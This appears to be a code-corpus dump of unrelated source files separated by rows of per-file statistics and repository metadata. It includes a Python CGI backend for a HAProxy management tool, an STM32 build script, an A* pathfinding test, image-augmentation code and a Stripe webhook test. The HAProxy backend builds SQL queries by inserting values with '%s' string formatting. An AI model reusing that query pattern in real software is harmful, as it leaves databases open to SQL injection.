cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: return cur.fetchall() cur.close() con.close() def select_keealived(serv, **kwargs): con, cur = get_cur() sql = """select keepalived from `servers` where ip='%s' """ % serv try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for value in cur.fetchone(): return value cur.close() con.close() def update_keepalived(serv): con, cur = get_cur() sql = """update `servers` set `keepalived` = '1' where ip = '%s' """ % serv try: cur.execute(sql) con.commit() return True except sqltool.Error as e: funct.out_error(e) con.rollback() return False cur.close() con.close() def select_nginx(serv, **kwargs): con, cur = get_cur() sql = """select nginx from `servers` where ip='%s' """ % serv try: cur.execute(sql) except sqltool.Error as e: funct.out_error(e) else: for value in cur.fetchone(): return value cur.close() con.close() def update_nginx(serv): con, cur = get_cur() sql = """update `servers` set `nginx` = '1' where ip = '%s' """ % serv try: cur.execute(sql) con.commit() return True except sqltool.Error as e: funct.out_error(e) con.rollback() return False cur.close() con.close() def update_haproxy(serv): con, cur = get_cur() sql = """update `servers` set `haproxy` = '1' where ip = '%s' """ % serv try: cur.execute(sql) con.commit() return True except sqltool.Error as e: funct.out_error(e) con.rollback() return False cur.close() con.close() def check_token_exists(token): try: import http.cookies import os cookie = http.cookies.SimpleCookie(os.environ.get("HTTP_COOKIE")) user_id = cookie.get('uuid') if get_token(user_id.value) == token: return True else: try: funct.logging('localhost', ' tried do action with wrong token', haproxywi=1, login=1) except: funct.logging('localhost', ' An action with wrong token', haproxywi=1) return False except: try: funct.logging('localhost', ' cannot check token', haproxywi=1, login=1) except: funct.logging('localhost', ' Cannot check token', haproxywi=1) return False form = funct.form error_mess = '<span class="alert alert-danger" id="error">All fields must be completed <a title="Close" id="errorMess"><b>X</b></a></span>' def check_token(): if not check_token_exists(form.getvalue('token')): print('Content-type: text/html\n') print("Your token has been expired") import sys sys.exit() def show_update_option(option): from jinja2 import Environment, FileSystemLoader env = Environment(loader=FileSystemLoader('templates/ajax'), autoescape=True) template = env.get_template('/new_option.html') print('Content-type: text/html\n') template = template.render(options=select_options(option=option)) print(template) def show_update_savedserver(server): from jinja2 import Environment, FileSystemLoader env = Environment(loader=FileSystemLoader('templates/ajax'), autoescape=True) template = env.get_template('/new_saved_servers.html') print('Content-type: text/html\n') template = template.render(server=select_saved_servers(server=server)) print(template) if form.getvalue('getoption'): group = form.getvalue('getoption') term = form.getvalue('term') print('Content-type: application/json\n') check_token() options = select_options(group=group,term=term) a = {} v = 0 for i in options: a[v] = i[0] v = v + 1 import json print(json.dumps(a)) if form.getvalue('newtoption'): option = form.getvalue('newtoption') group = form.getvalue('newoptiongroup') print('Content-type: text/html\n') check_token() if option is None or group is None: print(error_mess) else: if insert_new_option(option, group): show_update_option(option) if form.getvalue('updateoption') is not None: option = form.getvalue('updateoption') id = form.getvalue('id') check_token() if option is None or id is None: print('Content-type: text/html\n') print(error_mess) else: update_options(option, id) if form.getvalue('optiondel') is not None: print('Content-type: text/html\n') check_token() if delete_option(form.getvalue('optiondel')): print("Ok") if form.getvalue('getsavedserver'): group = form.getvalue('getsavedserver') term = form.getvalue('term') print('Content-type: application/json\n') check_token() servers = select_saved_servers(group=group,term=term) a = {} v = 0 for i in servers: a[v] = {} a[v]['value'] = {} a[v]['desc'] = {} a[v]['value'] = i[0] a[v]['desc'] = i[1] v = v + 1 import json print(json.dumps(a)) if form.getvalue('newsavedserver'): savedserver = form.getvalue('newsavedserver') description = form.getvalue('newsavedserverdesc') group = form.getvalue('newsavedservergroup') print('Content-type: text/html\n') check_token() if savedserver is None or group is None: print(error_mess) else: if insert_new_savedserver(savedserver, description, group): show_update_savedserver(savedserver) if form.getvalue('updatesavedserver') is not None: savedserver = form.getvalue('updatesavedserver') description = form.getvalue('description') id = form.getvalue('id') print('Content-type: text/html\n') check_token() if savedserver is None or id is None: print(error_mess) else: update_savedserver(savedserver, description, id) if form.getvalue('savedserverdel') is not None: print('Content-type: text/html\n') check_token() if delete_savedserver(form.getvalue('savedserverdel')): print("Ok")
28.365116
223
0.638333
7,372
48,788
4.119778
0.035404
0.038096
0.052748
0.058609
0.829278
0.805769
0.76955
0.73399
0.688617
0.661058
0
0.007759
0.210175
48,788
1,719
224
28.381617
0.780402
0.000881
0
0.752343
0
0.04083
0.422009
0.028578
0
0
0
0
0
1
0.057564
false
0.008701
0.008032
0
0.119813
0.018742
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2a0e09e76133e146c4da55d9f084f1d66d03aa16
1,739
py
Python
platform/mcu/stm32f4xx/peripherals/libraries/ucube.py
jinlongliu/AliOS-Things
ce051172a775f987183e7aca88bb6f3b809ea7b0
[ "Apache-2.0" ]
54
2018-10-10T01:43:10.000Z
2022-02-26T01:36:40.000Z
platform/mcu/stm32f4xx/peripherals/libraries/ucube.py
IamBaoMouMou/AliOS-Things
195a9160b871b3d78de6f8cf6c2ab09a71977527
[ "Apache-2.0" ]
4
2019-04-28T04:07:47.000Z
2021-07-05T13:30:01.000Z
platform/mcu/stm32f4xx/peripherals/libraries/ucube.py
IamBaoMouMou/AliOS-Things
195a9160b871b3d78de6f8cf6c2ab09a71977527
[ "Apache-2.0" ]
48
2018-08-14T07:12:33.000Z
2022-03-01T03:52:32.000Z
src = Split(''' system_stm32f4xx.c STM32F4xx_StdPeriph_Driver/src/misc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_adc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_can.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_crc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_dac.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_dbgmcu.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_dma.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_exti.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_flash.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_gpio.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_rng.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_i2c.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_iwdg.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_pwr.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_rcc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_rtc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_sdio.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_spi.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_syscfg.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_tim.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_usart.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_wwdg.c ''') component = aos_component('STM32F4xx_Peripheral_Libraries', src) if aos_global_config.get('HOST_MCU_VARIANT') not in ['STM32F411', 'STM32F401']: component.add_sources('STM32F4xx_StdPeriph_Driver/src/stm32f4xx_fsmc.c') if aos_global_config.get('HOST_MCU_VARIANT') == 'STM32F412': component.add_sources('STM32F4xx_StdPeriph_Driver/src/stm32f4xx_qspi.c') component.add_global_includes('STM32F4xx_StdPeriph_Driver/inc', '../../../' +aos_global_config.arch +'/CMSIS')
48.305556
110
0.776883
219
1,739
5.753425
0.242009
0.357143
0.47619
0.514286
0.780159
0.757937
0.14127
0.14127
0
0
0
0.110963
0.139735
1,739
35
111
49.685714
0.731283
0
0
0
0
0
0.846463
0.673951
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2a11da68bba8faf93b53a90eec95ad0b60f58541
101
py
Python
peco/parser/read_at.py
Tikubonn/peco
c77fc163ad31d3c271d299747914ce4ef3386987
[ "MIT" ]
null
null
null
peco/parser/read_at.py
Tikubonn/peco
c77fc163ad31d3c271d299747914ce4ef3386987
[ "MIT" ]
null
null
null
peco/parser/read_at.py
Tikubonn/peco
c77fc163ad31d3c271d299747914ce4ef3386987
[ "MIT" ]
null
null
null
from peco.template import TextNode def read_at(preread, stream, parser): return TextNode("@")
14.428571
37
0.722772
13
101
5.538462
0.923077
0
0
0
0
0
0
0
0
0
0
0
0.168317
101
6
38
16.833333
0.857143
0
0
0
0
0
0.01
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
2a74892960ef59aac7095ea2d6b9909c47a92b5f
2,507
py
Python
test/test_AStarPython.py
tianyuzhou-sam/astar-algorithm-cpp
056ef5b8dd5644bbc0ee1548f2be00461132ceec
[ "MIT" ]
1
2021-03-25T02:28:52.000Z
2021-03-25T02:28:52.000Z
test/test_AStarPython.py
tianyuzhou-sam/astar-algorithm-cpp
056ef5b8dd5644bbc0ee1548f2be00461132ceec
[ "MIT" ]
null
null
null
test/test_AStarPython.py
tianyuzhou-sam/astar-algorithm-cpp
056ef5b8dd5644bbc0ee1548f2be00461132ceec
[ "MIT" ]
1
2022-02-03T04:32:29.000Z
2022-02-03T04:32:29.000Z
#!/usr/bin/env python3 import os import sys sys.path.append(os.getcwd()+'/build') import AStarPython if __name__ == "__main__": # define the world map map_width = 20 map_height = 20 world_map = [ # 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, # 00 1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,1, # 01 1,9,9,1,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 02 1,9,9,1,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 03 1,9,1,1,1,1,9,9,1,9,1,9,1,1,1,1,9,9,1,1, # 04 1,9,1,1,9,1,1,1,1,9,1,1,1,1,9,1,1,1,1,1, # 05 1,9,9,9,9,1,1,1,1,1,1,9,9,9,9,1,1,1,1,1, # 06 1,9,9,9,9,9,9,9,9,1,1,1,9,9,9,9,9,9,9,1, # 07 1,9,1,1,1,1,1,1,1,1,1,9,1,1,1,1,1,1,1,1, # 08 1,9,1,9,9,9,9,9,9,9,1,1,9,9,9,9,9,9,9,1, # 09 1,9,1,1,1,1,9,1,1,9,1,1,1,1,1,1,1,1,1,1, # 10 1,9,9,9,9,9,1,9,1,9,1,9,9,9,9,9,1,1,1,1, # 11 1,9,1,9,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 12 1,9,1,9,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 13 1,9,1,1,1,1,9,9,1,9,1,9,1,1,1,1,9,9,1,1, # 14 1,9,1,1,9,1,1,1,1,9,1,1,1,1,9,1,1,1,1,1, # 15 1,9,9,9,9,1,1,1,1,1,1,9,9,9,9,1,1,1,1,1, # 16 1,1,9,9,9,9,9,9,9,1,1,1,9,9,9,1,9,9,9,9, # 17 1,9,1,1,1,1,1,1,1,1,1,9,1,1,1,1,1,1,1,1, # 18 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 # 19 ] # for AStarPython, 0 for no obstacles; 255 for obstacles for idx in range(len(world_map)): if world_map[idx] == 9: world_map[idx] = 255 else: world_map[idx] = 0 # define the start and goal start = [0, 0] end = [14, 10] path, steps_used = AStarPython.FindPath(start, end, world_map, map_width, map_height) print("This is the path. " + "Steps used:" + str(steps_used)) for idx in range(0,len(path),2): str_print = str(path[idx]) + ', ' + str(path[idx+1]) print(str_print) # This is for an agent and a set of targets agent_position = [0, 0] targets_position = [0,19, 19,19, 19,0] path_many, steps_all = AStarPython.FindPathAll(agent_position, targets_position, world_map, map_width, map_height) print("These are all the paths:") for i in range(0,len(path_many),1): print("This is a path. " + "Steps used:" + str(steps_all[i])) for j in range(0,len(path_many[i]),2): str_print = str(path_many[i][j]) + ', ' + str(path_many[i][j+1]) print(str_print)
39.793651
118
0.512964
645
2,507
1.934884
0.125581
0.240385
0.269231
0.278846
0.485577
0.399038
0.366186
0.314103
0.307692
0.290064
0
0.275862
0.248105
2,507
63
119
39.793651
0.386207
0.113682
0
0.28
0
0
0.044606
0
0
0
0
0
0
1
0
false
0
0.06
0
0.06
0.14
0
0
1
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2a822e828d65883bbfa7463fe18c91a0b22a5e47
29
py
Python
stalker/__init__.py
caian-org/stock-stalker
e571341a748cf6117ffbe39077f5a4f1e2f5abd7
[ "CC0-1.0" ]
null
null
null
stalker/__init__.py
caian-org/stock-stalker
e571341a748cf6117ffbe39077f5a4f1e2f5abd7
[ "CC0-1.0" ]
null
null
null
stalker/__init__.py
caian-org/stock-stalker
e571341a748cf6117ffbe39077f5a4f1e2f5abd7
[ "CC0-1.0" ]
null
null
null
from .handler import handler
14.5
28
0.827586
4
29
6
0.75
0
0
0
0
0
0
0
0
0
0
0
0.137931
29
1
29
29
0.96
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
aa758a688fca0ef7b8f5cb9e9ae7ecd910153e7d
1,072
py
Python
cherry/__init__.py
natethinks/cherry
a482621a3e397f6667f21e16d5ec0eb12c7fc4fb
[ "MIT" ]
1
2020-03-07T16:59:09.000Z
2020-03-07T16:59:09.000Z
cherry/__init__.py
natethinks/cherry
a482621a3e397f6667f21e16d5ec0eb12c7fc4fb
[ "MIT" ]
null
null
null
cherry/__init__.py
natethinks/cherry
a482621a3e397f6667f21e16d5ec0eb12c7fc4fb
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Naive Bayes Classifier ~~~~~~~~~~~~~~~~~~~~~ cherry is a python classifier library usage: >>> import cherry >>> result = cherry.classify('警方召开了全省集中打击赌博违法犯罪活动专项行动电视电话会议。会议的重点是“查处”六合彩、赌球赌马等赌博活动。') >>> result.percentage [('normal.dat', 0.7310585786300049), ('gamble.dat', 0.2689414213699951)] >>> result.words_list [('查处', 1.6550930245052333), ('电视电话会议', 0.844162808288905), ('活动', 3.0746199776976972), ('赌博', 1.8186042209197311), ('警方', 2.7900729573442176), ('六合彩', 1.4727714677112775), ('违法犯罪', 2.7900729573442176), ('全省', 1.0673063596031147), ('集中', 1.1626165394074395), ('召开', 1.2496279163970687), ('打击', 3.0687863598132381), ('专项', 1.5373099888488495), ('赌球', 1.7604535401630592), ('会议', 2.0969257767842722), ('重点', 2.0228178046305505), ('赌马', 0.1510156277289596), ('行动', 2.3482402050651787)] :copyright: (c) 2018-2019 by Windson Yang :license: MIT License, see LICENSE for more details. """ # workflow: search -> display -> train -> classify -> performance from .api import classify, train, performance, search, display
51.047619
485
0.679104
116
1,072
6.267241
0.715517
0.011004
0
0
0
0
0
0
0
0
0
0.348055
0.112873
1,072
20
486
53.6
0.416404
0.928172
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
aa8ca47187baba87fd1dbec992aca91a3ce52b34
194
py
Python
utils/config.py
dschori/Agroscope
69a174d400b5cc1f842a825d73ade4b7ddb28590
[ "MIT" ]
2
2021-01-20T08:31:15.000Z
2021-07-26T13:26:03.000Z
utils/config.py
dschori/Agroscope
69a174d400b5cc1f842a825d73ade4b7ddb28590
[ "MIT" ]
7
2020-03-31T11:30:35.000Z
2022-02-10T01:39:46.000Z
utils/config.py
dschori/Rumex-Detection
69a174d400b5cc1f842a825d73ade4b7ddb28590
[ "MIT" ]
null
null
null
class Config(object): DATA_BASE_PATH = '../data' RAW_PATH = '../data/LabelingTool/' DATA_IMAGE_PATH = DATA_BASE_PATH + '/Images' DATA_MASK_PATH = DATA_BASE_PATH + '/Masks' SHAPE = (512,768)
32.333333
45
0.71134
28
194
4.535714
0.535714
0.251969
0.283465
0.251969
0
0
0
0
0
0
0
0.035503
0.128866
194
6
46
32.333333
0.715976
0
0
0
0
0
0.210256
0.107692
0
0
0
0
0
1
0
false
0
0
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
6
aad8cfb926613355ab45ff15f32052d7c421288c
154
py
Python
hydraseq/__init__.py
Niarfe/hydraseq
43939e58857581fd493bf603038dcb72c419f30f
[ "MIT" ]
null
null
null
hydraseq/__init__.py
Niarfe/hydraseq
43939e58857581fd493bf603038dcb72c419f30f
[ "MIT" ]
1
2019-11-03T01:00:18.000Z
2019-11-03T01:00:18.000Z
hydraseq/__init__.py
hydraseq/hydraseq
43939e58857581fd493bf603038dcb72c419f30f
[ "MIT" ]
null
null
null
name = "hydraseq" __version__ = '0.0.30' from hydraseq.hydraseq import Node from hydraseq.hydraseq import Hydraseq from hydraseq.automata import DFAstate
25.666667
38
0.811688
21
154
5.761905
0.47619
0.297521
0.330579
0.429752
0
0
0
0
0
0
0
0.029412
0.116883
154
5
39
30.8
0.860294
0
0
0
0
0
0.090909
0
0
0
0
0
0
1
0
false
0
0.6
0
0.6
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
aae0944989401f7bbde8ab0241eac9846a67b2fb
7,812
py
Python
nutszebra_data_augmentation.py
nutszebra/trainer
9359c6ed01c5dad832e957e0adc1a41c79967044
[ "MIT" ]
5
2016-12-25T02:55:28.000Z
2018-05-30T10:40:36.000Z
nutszebra_data_augmentation.py
nutszebra/trainer
9359c6ed01c5dad832e957e0adc1a41c79967044
[ "MIT" ]
null
null
null
nutszebra_data_augmentation.py
nutszebra/trainer
9359c6ed01c5dad832e957e0adc1a41c79967044
[ "MIT" ]
2
2017-12-14T19:45:04.000Z
2019-08-24T03:19:35.000Z
import numpy as np import nutszebra_data_augmentation_picture from functools import wraps da = nutszebra_data_augmentation_picture.DataAugmentationPicture() def reset(func): @wraps(func) def wrapper(self, *args, **kwargs): da() return func(self, *args, **kwargs) return wrapper class DataAugmentationCifar10NormalizeSmall(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(32, 36)).crop_picture_randomly(1.0, sizes=(32, 32)).cutout(0.5, sizes=(16, 16)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(32, 32), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeMiddle(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(64, 68)).crop_picture_randomly(1.0, sizes=(64, 64)).cutout(0.5, sizes=(32, 32)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(64, 64), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeBig(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(128, 132)).crop_picture_randomly(1.0, sizes=(128, 128)).cutout(0.5, sizes=(64, 64)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(128, 128), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeBigger(object): @staticmethod @reset def train(img): da.convert_to_image_format(img).resize_image_randomly(1.0, size_range=(256, 512)).crop_picture_randomly(1.0, sizes=(224, 224)).cutout(0.5, sizes=(112, 112)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.convert_to_image_format(img).resize_image_randomly(1.0, size_range=(384, 384), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeHuge(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(299, 512)).crop_picture_randomly(1.0, sizes=(299, 299)).cutout(0.5, sizes=(114, 114)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(406, 406), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeSmall(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(32, 36)).crop_picture_randomly(1.0, sizes=(32, 32)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(32, 32), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeMiddle(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(64, 68)).crop_picture_randomly(1.0, sizes=(64, 64)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(64, 64), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeBig(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(129, 132)).crop_picture_randomly(1.0, sizes=(128, 128)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(128, 128), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeBigger(object): @staticmethod @reset def train(img): da.load_picture(img).gray_to_rgb(1.0).resize_image_randomly(1.0, size_range=(256, 512)).crop_picture_randomly(1.0, sizes=(224, 224)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).gray_to_rgb(1.0).resize_image_randomly(1.0, size_range=(384, 384), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeHuge(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(299, 512)).crop_picture_randomly(1.0, sizes=(299, 299)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(406, 406), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DoNothing(object): @staticmethod @reset def train(img): return img, None @staticmethod @reset def test(img): return img, None class Ndim(object): def __init__(self, ndim=3): self.ndim = ndim def train(self, img): img = np.array(img) if not img.ndim == self.ndim: diff = self.ndim - img.ndim img = np.reshape(img, (1,) * diff + img.shape) return img, None def test(self, img): img = np.array(img) if not img.ndim == self.ndim: diff = self.ndim - img.ndim img = np.reshape(img, (1,) * diff + img.shape) return img, None class DataAugmentationNormalizeBigOneChannel(object): @staticmethod @reset def train(img): da.load_picture(img, ndim=2).resize_image_randomly(1.0, size_range=(129, 132)).crop_picture_randomly(1.0, sizes=(128, 128)).normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img, ndim=2).resize_image_randomly(1.0, size_range=(128, 128), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info
37.023697
259
0.698157
1,160
7,812
4.493103
0.080172
0.033385
0.063315
0.084421
0.853607
0.848427
0.841903
0.835955
0.835955
0.82924
0
0.070457
0.162442
7,812
210
260
37.2
0.72612
0
0
0.683871
0
0
0.011265
0
0
0
0
0
0
1
0.187097
false
0
0.019355
0.012903
0.470968
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2aed6ae4246e829a13d68c37df04665448927dca
165
py
Python
src/z3c/saconfig/__init__.py
nazrulworld/z3c.saconfig
6096b98935561b7d6f333bba40d1a850241e2da1
[ "ZPL-2.1" ]
null
null
null
src/z3c/saconfig/__init__.py
nazrulworld/z3c.saconfig
6096b98935561b7d6f333bba40d1a850241e2da1
[ "ZPL-2.1" ]
null
null
null
src/z3c/saconfig/__init__.py
nazrulworld/z3c.saconfig
6096b98935561b7d6f333bba40d1a850241e2da1
[ "ZPL-2.1" ]
null
null
null
from z3c.saconfig.scopedsession import Session, named_scoped_session from z3c.saconfig.utility import ( GloballyScopedSession, SiteScopedSession, EngineFactory)
41.25
68
0.848485
17
165
8.117647
0.705882
0.101449
0.217391
0
0
0
0
0
0
0
0
0.013423
0.09697
165
3
69
55
0.912752
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2d5412ab2ba001f5808bad65ebb0c7ffb5104246
20
py
Python
coresender/requests/__init__.py
coresender/coresender-sdk-python
76666eb4187042d35b88c34cb3201591dd86ffca
[ "MIT" ]
8
2020-06-02T13:47:40.000Z
2020-07-27T11:48:59.000Z
coresender/requests/__init__.py
coresender/coresender-sdk-python
76666eb4187042d35b88c34cb3201591dd86ffca
[ "MIT" ]
null
null
null
coresender/requests/__init__.py
coresender/coresender-sdk-python
76666eb4187042d35b88c34cb3201591dd86ffca
[ "MIT" ]
null
null
null
from .send import *
10
19
0.7
3
20
4.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.2
20
1
20
20
0.875
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2d6c9a9c90d748596a0ea34527713abc05caaac3
14,322
py
Python
tests/test_webhooks.py
gbozee/pystripe
42ffef976bfec5ee0021c53dcd29676abdf78204
[ "MIT" ]
null
null
null
tests/test_webhooks.py
gbozee/pystripe
42ffef976bfec5ee0021c53dcd29676abdf78204
[ "MIT" ]
null
null
null
tests/test_webhooks.py
gbozee/pystripe
42ffef976bfec5ee0021c53dcd29676abdf78204
[ "MIT" ]
1
2019-11-05T18:51:00.000Z
2019-11-05T18:51:00.000Z
from pystripe.api import signals from pystripe import utils from dispatch import receiver import pytest @receiver(signals.successful_payment_signal) def signal_called(sender, **kwargs): kwargs.pop("signal", None) generic_function(**kwargs) def generic_function(**params): print(params) @receiver(signals.failed_payment_signal) def signal_called_2(sender, **kwargs): kwargs.pop("signal", None) generic_function(**kwargs) @pytest.fixture def mock_generic_func(mocker): mock_successful_call = mocker.patch("test_webhooks.generic_function") mock_digest = mocker.patch("stripe.WebhookSignature.verify_header") mock_digest.return_value = True return mock_successful_call def test_successful_charge_webhook_signal( mock_generic_func, stripe_api: utils.StripeAPI ): body = """{ "id": "evt_1FZp49Hv0Y0PURSqIxXfx6W1", "object": "event", "api_version": "2019-03-14", "created": 1572572201, "data": { "object": { "id": "ch_1FZp48Hv0Y0PURSq0buZ6d6f", "object": "charge", "amount": 2000, "amount_refunded": 0, "application": null, "application_fee": null, "application_fee_amount": null, "balance_transaction": "txn_1FZp48Hv0Y0PURSqV70KLTLF", "billing_details": { "address": {"city": null, "country": null, "line1": null, "line2": null, "postal_code": null, "state": null}, "email": null, "name": null, "phone": null }, "captured": true, "created": 1572572200, "currency": "usd", "customer": null, "description": null, "destination": null, "dispute": null, "failure_code": null, "failure_message": null, "fraud_details": {}, "invoice": null, "livemode": false, "metadata": {}, "on_behalf_of": null, "order": null, "outcome": {"network_status": "approved_by_network", "reason": null, "risk_level": "normal", "risk_score": 42, "seller_message": "Payment complete.", "type": "authorized"}, "paid": true, "payment_intent": null, "payment_method": "card_1FZp48Hv0Y0PURSqsmipr0Rv", "payment_method_details": {"card": {"brand": "visa", "checks": {"address_line1_check": null, "address_postal_code_check": null, "cvc_check": null}, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": null, "last4": "4242", "network": "visa", "three_d_secure": null, "wallet": null}, "type": "card"}, "receipt_email": null, "receipt_number": null, "receipt_url": "https://pay.stripe.com/receipts/acct_1EJOOLHv0Y0PURSq/ch_1FZp48Hv0Y0PURSq0buZ6d6f/rcpt_G616Ubt8hAj7Th4vdY2MfK34OAIxOPi", "refunded": false, 